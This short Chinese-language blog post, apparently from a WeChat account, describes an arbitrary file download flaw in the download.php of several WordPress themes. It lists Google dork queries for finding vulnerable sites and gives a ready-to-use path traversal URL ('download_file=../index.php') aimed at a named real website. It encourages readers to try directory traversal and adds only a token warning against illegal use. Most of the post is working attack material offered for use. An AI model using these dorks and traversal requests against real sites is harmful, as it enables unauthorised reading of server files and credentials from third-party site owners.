Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php"

exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

WordPress 文件下载漏洞 Safe 第1张

 

google dork: 

inurl:"/wp-content/themes/newspro2891/download.php"

inurl:"/wp-content/themes/cafesalivation/download.php"

inurl:"/wp-content/themes/duena/download.php"

WordPress 文件下载漏洞 Safe 第2张

可以尝试跨目录访问,碰下运气,稳一波

WordPress 文件下载漏洞 Safe 第3张

WordPress 文件下载漏洞 Safe 第4张

各位可以自行测试,请勿非法使用!!

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄